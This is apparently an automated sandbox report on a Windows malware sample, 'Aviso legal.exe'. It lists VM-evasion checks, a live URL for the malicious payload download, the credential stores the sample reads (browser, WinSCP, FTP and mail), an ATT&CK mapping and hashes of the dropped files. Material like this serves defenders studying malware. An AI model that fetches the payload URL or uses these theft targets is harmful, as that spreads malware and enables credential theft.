Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Aviso legal.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Aviso legal.exe	Memory allocated: 120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Memory allocated: 36270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Memory allocated: 36070000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Aviso legal.exe

API coverage: 2.7 %

Source: C:\Users\user\Desktop\Aviso legal.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Aviso legal.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	10_2_00405C49
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_00406873 FindFirstFileW,FindClose,	10_2_00406873
Source: C:\Users\user\Desktop\Aviso legal.exe	Code function: 10_2_0040290B FindFirstFileW,	10_2_0040290B

Source: Aviso legal.exe, 0000000A.00000002.6058215595.0000000005A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Aviso legal.exe, 0000000A.00000002.6058215595.0000000005A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,Q

Source: C:\Users\user\Desktop\Aviso legal.exe	API call chain: ExitProcess graph end node			graph_0-4308
Source: C:\Users\user\Desktop\Aviso legal.exe	API call chain: ExitProcess graph end node			graph_0-4463

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 10_2_00401941 LdrInitializeThunk,

10_2_00401941

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_705B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_705B1BFF

Source: C:\Users\user\Desktop\Aviso legal.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Process created: C:\Users\user\Desktop\Aviso legal.exe "C:\Users\user\Desktop\Aviso legal.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Users\user\Desktop\Aviso legal.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Aviso legal.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: C:\Users\user\Desktop\Aviso legal.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Aviso legal.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Aviso legal.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Aviso legal.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aviso legal.exe PID: 6196, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	12 Virtualization/Sandbox Evasion	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	26 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Aviso legal.exe	100%	Avira	HEUR/AGEN.1331786
Aviso legal.exe	18%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	Avira URL Cloud	safe
http://lovekelley.ru.com/FroOsE89.bin	100%	Avira URL Cloud	malware
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		unknown
lovekelley.ru.com	172.93.121.7	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	Avira URL Cloud: safe	unknown
http://lovekelley.ru.com/FroOsE89.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	Aviso legal.exe, 00000000.00000000.954159692.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Aviso legal.exe, 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Aviso legal.exe, 0000000A.00000000.1264288005.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
172.93.121.7	lovekelley.ru.com	United States		393960	HOST4GEEKS-LLCUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1445943
Start date and time:	2024-05-22 20:28:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Aviso legal.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@3/22@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 113 Number of non-executed functions: 63
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, tse1.mm.bing.net, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Aviso legal.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
172.93.121.7	MSK203.exe	Get hash	malicious	GuLoader	Browse	larpawards.sa.com/IEiHcWVkgF180.bin
	Pro_Samples.exe	Get hash	malicious	GuLoader	Browse	magnocomx.ru.com/LOxkgzXaULOn55.bin
	SAMPLES.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	magnocomx.ru.com/MHCJMpUZ92.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Inventory_list.img.exe	Get hash	malicious	GuLoader	Browse	104.26.13.205
	Draft BL copy.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SOA_41457.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	INSTALLATION BOQ KATSINA.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Doc1000050789.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	SecuriteInfo.com.Win64.PWSX-gen.16698.32595.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rSipari__PO408232023_ZNG__stanbul_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	MSK203.exe	Get hash	malicious	GuLoader	Browse	104.26.12.205
	PO N#U00b0202415-0004 LUZNAGRA-INDUSTRIA_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PURCHASE ORDER.doc	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://tome.app/magic-inc-575/battalion-oil-corp-clwf4e8zj1eawod650qdnv0xx?page=kr1gn8q23ho9ojwq7i3rue30&d=DwMFAg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://bunmioyinsan.com/404.php?7-797967704b53693230746650794d394c5361334d7a632f50307973713163744c4c644776536a59334337616f384e4850424d705536475755354f594141413d3d=797967704b536932307465767143677379306c4b4c5333504e74444c4b63334e4c4d354c4c4b7255793873763079737131516341&em=bWplc3NlQGJyb3duaW5nY2hhcG1hbi5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	Colep Packaging Polska (602447) - invoice 342000749.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	Noyan Order Feb 2024 - Globalimportgroup.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Inventory_list.img.exe	Get hash	malicious	GuLoader	Browse	104.26.13.205
	ordendecarga241626casadoorsm.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	https://umn.adnxs.com/clktrb?id=092070&redir=//cloudflare-ipfs.com/ipfs/bafybeia2uvj3sitwpuaf4jgessydk6eoaspcym62bihuwbygggcbgd4nna/?*/oMTqwOWufzKCNnxPSr8v6y2ySjfHWwR+7bB3gi8sS7dz5VngVaYN21vSPDPIt+zL2eLaYM3MXtiohyqv#cGhpc2hpbmdAdW1uLmVkdQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://tome.app/magic-inc-575/battalion-oil-corp-clwf4e8zj1eawod650qdnv0xx?page=kr1gn8q23ho9ojwq7i3rue30	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	172.67.75.166
HOST4GEEKS-LLCUS	CONTRACTUL MODIFICAT-pdf.bat.exe	Get hash	malicious	AgentTesla	Browse	172.93.120.190
	MSK203.exe	Get hash	malicious	GuLoader	Browse	172.93.121.7
	Pro_Samples.exe	Get hash	malicious	GuLoader	Browse	172.93.121.7
	SAMPLES.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.93.121.7
	Liste d'inventaire.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.221.216.115
	Production_list.exe	Get hash	malicious	GuLoader	Browse	185.221.216.115
	Inventory_list.exe	Get hash	malicious	GuLoader	Browse	185.221.216.115
	Doc_for Gregpurdy.docx	Get hash	malicious	HTMLPhisher	Browse	172.93.120.161
	Dataupdate.exe	Get hash	malicious	GuLoader	Browse	185.221.216.115
	UPS DOCS.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.221.216.115

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Inventory_list.img.exe	Get hash	malicious	GuLoader	Browse	104.26.12.205
	temp.vbs	Get hash	malicious	GuLoader, XWorm	Browse	104.26.12.205
	Airbornemx SWIFT COPY _ Wednesday May 2024..rtf	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	Draft BL copy.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	what dmv forms do i need to sell my car in ny 88970.js	Get hash	malicious	GookitLoader	Browse	104.26.12.205
	RFQ-101432620247fl#U00e2#U00aexslx.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SOA_41457.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	QUOTATION SHEET_RFQ 564077 2024.5.17.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	INSTALLATION BOQ KATSINA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll	MSK203.exe	Get hash	malicious	GuLoader	Browse
	MSK203.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse
	61pzTJKVJX.exe	Get hash	malicious	DCRat	Browse
	990009371653-Q095605-0-TB727985.exe	Get hash	malicious	GuLoader	Browse
	Structure description-Rev.00.exe	Get hash	malicious	GuLoader	Browse
	#Ubcf5#Uc0ac#Ubcf8 NDS24000012-2-Rev.0.exe	Get hash	malicious	GuLoader	Browse
	RFQ-NVW-Norsok-EQPT REQS-Rev.00.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\geokemi\Alarmsystemerne.Cos

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	409078
Entropy (8bit):	7.025047982289486
Encrypted:	false
SSDEEP:	6144:OfFg587/PrfLt9lGgbFJDyW2CIqjgOov+PoQJ3yEDi9UlzbWIBSYtU1vMfud:ONg58DzfLt9nbFJDxXcT+A6DP0aSYtbQ
MD5:	7590D8090323B4D45AB454BA0F2ACD51
SHA1:	FA077E6D2FA069CA51852408A0A2D047BC57F5AD
SHA-256:	8D5E0C4D96592BFB50D72E07228097FC855A248CD2E3DF72984AB17CE9489180
SHA-512:	32CA31F735849E8309E52C548704A6BE578F2BFA4BF7FCBD2BBF9AB14F71C05BDEBFB52EEBC077C2FD167D0EF91E14E61ED29252CE76F48074BAB92A22624CFD
Malicious:	false
Reputation:	low
Preview:	........t.@@@...@......N.......]]..............JJ.???.BB...///..........d..........d...uu.t......X........[...XX.....'.FF.......ffff.............................................................o.88888....EEE..{{{{{................................W.....FF...}}}...............ee............................}..........x... ........................cc.)).---.."""..C...^.....................1..............[..............3....................0.."""....vvv.;...................................................C..k............222......>......+..D...u............-..!.....00........))...............III.}}}................#.......................))...4.....###...z.L..-........NN........}}}.....................IIII.a......."""".#.\|........11.mm...&&.................]]...A..F.......'......xx.......k.............K............>.......................................................***........N..........;..........................<<<.e.EE.........J.""............ii..................rr.v.................

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Affotograferes.und

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	2722
Entropy (8bit):	4.839690262251353
Encrypted:	false
SSDEEP:	48:9WnDbvUVgjwxk7wk8PQfmln5hXmXohRU5lhK/PgknruS/D072pPGE3/Nf:0H4AMc/RfyZmXohRUhKngYDD0yp+At
MD5:	92B65A4EA85F4C1AF62CB993C61D4568
SHA1:	E79E5232494CA1FED6CD9BC4915C0125623B96CD
SHA-256:	C14C2EC59396E3A6C1E8CA9ED1216674B7F291E322ADBB235EB10C3EAED9650C
SHA-512:	4821CE96C99D6782BB7DB99E55E699B986D6F6C8B1B57AF6C9E7C4152C46FA50FB221DD54AECCF142A5E8D08808A9821EC0F5BA094EFEAF4EC453B1CA78530BC
Malicious:	false
Reputation:	low
Preview:	j.... ....(......I.......#..E..j....}.....!........W2..2...;.....(]...ZD..f..'-S...._/..E&..].........W....\|..........)...............o...Y.........#...\..../..a......H...........R.&.....5......#....L....c............25.....A..N..../..i[..e...i.................I>.......x..v...i...45.....+.. ........F.............$..M...........W.Im.J...x......a.....N...H........:E.b..........{.......G.@...3........A]\.......i.(:..G\..u..........a.....v.......G.....C,.c.....+?.s...T................x..................o....[........I...................O........ .......l...^.b.........]..............G.........1.R.............D...........E.b...]....4w..L...............o........g...........p.4..J..v.[.I^....=/..........G.E....E.0.VL {...a.......].....G/....L.............@.....;..................B.n~....?...N......d).R'......&.....+.~.'.sl...I..m.....3...&.....]..B..x.i.k.Q.T.......H\|....r*....U.S.....V.p.q...e..J..~......).......#.\|.'........oO...............9.uj.m............#.._.{t..!...

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Blowfish77.eil

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	4874
Entropy (8bit):	4.920645246986102
Encrypted:	false
SSDEEP:	96:0SaNvSiGMnOW/lBLz7rTbdD+3i6sG+dlWYzrRz/xOXJD8fNOvqg0JZ:0prDjLzvTbdN6wdpzrH4SLJZ
MD5:	6A8C19E05EA72B2EE372C52E9DE150A4
SHA1:	C452083D0DC5A85CD773650D5D3F0F87DC1A32A6
SHA-256:	A58474474F73CB6EAC7C81D72004AB151C47B179C41D29D73E9CDB2C532453E7
SHA-512:	64C825FF86B1CE4500D34D980A17214418FAEDE7C5F61AAEC7118B75BDA847BA6465AA675EF07612B46AED914CA6D84C2D0F1BEC25BFCCB7A482194C13B3B00C
Malicious:	false
Reputation:	low
Preview:	i..qE....k;..f......9............AR..`...K......x..Y........?.HI..`D.?.................W..............8....m.D...S...W...}.....P......<...................v.b.......+...........0............9K...\........O..g...k..............sHZ....L............................0O.............a....-.............g.D5........$............4...@.',.p.......r...S{....<.......,a(....CV........,.....p.........5..-.\.........W.....B(.H..V...................N......P.....d6Q...@.R.....w......9..,..L.....B...._...........!...om.$^.u6..........Q... ..U.T..e...............+&.g.g{....qv.....0.....?2.v................."....X.p.R......./..P.....Bn..P...g.o....f............W......E.X.:._..`......I..........[.....E.......W.V...................4...%..............}...G..C.........*..]=.+..........D.......2...J..........l...D....?..................<........_-......8.P..\|............+..e.......,..7G....F..........\.......T. .V...........m.....4...,....1..?.............T..j.....y...B..u......q..h..K.........@........

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\minkfishes.uds

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	3195
Entropy (8bit):	4.826172613201672
Encrypted:	false
SSDEEP:	48:lX4ebVADs8uHITJH2Zk59dKvOlEyDtVdwk25jdM7lJ73NSjUqEqow:S8VADluHIZmkX9dR25RkJLNSjUqEqow
MD5:	6086222E2529C10A1AEB663C2288CF7B
SHA1:	FCEE6B724FB6C4584037EC812CE6CFF5EDD42087
SHA-256:	1DC923EE41E90DEC393A8B7625B4FD439F1974BF97FBD2508BA05FE194BF1DF2
SHA-512:	17812F6669FA981913E89CFDC635B696672CE31B3960237E3BD1B3668BECC5496067CBAFD3BE1DA2DABD10A99B20DE9B2E98B30766EB607D96952C699ED22492
Malicious:	false
Reputation:	low
Preview:	.I........~...........~o.D.......e.?........../'...............................ql).....j.................&........T....P..C... ......t.!..".....<..9..y...3.........!..g..0<...ns....;6...S....+......V..........3. .\|....H.q..j..m.................Wn........8.&...=.....w...........>.W.....I................B2}.T.........i.&..9.D.}........0...........Fa.........M.....9Y..1.....T\|......m....?..Z......>...........K...Yt.....}.4........(2...+.J...R...............L?.Nk..n......?.....g;.............................v...J...R..!...........&...o..........:.........\|..O............".).........<.....o.....F....oI..X........l.........'k......{......I.......z.................).....y(\|......t....n..........u.....................9.O. .............`v9......&....5......X......D....B......d..X....O.\............5.s............I................}......2...`.[pr......E...\|..........h.R.............(..w...........6......................V.....M...2.$..f...v....%...3..f..........i........^.....

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\partiality.ste

Download File

Process:	C:\Users\user\Desktop\Aviso legal.exe
File Type:	data
Category:	dropped
Size (bytes):	4002
Entropy (8bit):	4.943041620513792
Encrypted:	false
SSDEEP:	96:CsV83xzIfux1gb13Xm4DdkLgA6m7jcxhtekQk:CU8hAMQdhk0A774xhX
MD5:	018A675A1E69825895455988720F29A6
SHA1:	851955113A180EFBD020A625A2DBD55AEC4722B0
SHA-256:	434FC226BC639382893C1742DA91B39578531F13D24804F5CA815907885DA53E
SHA-512:	D11B8A9E0B2DE3F3E63D5D3FFCF1D0D8E8ACAC3B87F5D12FB669B8918AB79E99501AD82F489F3C2FA21190C5020104E322FCA25C82AFA57C4CC20B7F61BA61FB
Malicious:	false
Reputation:	low
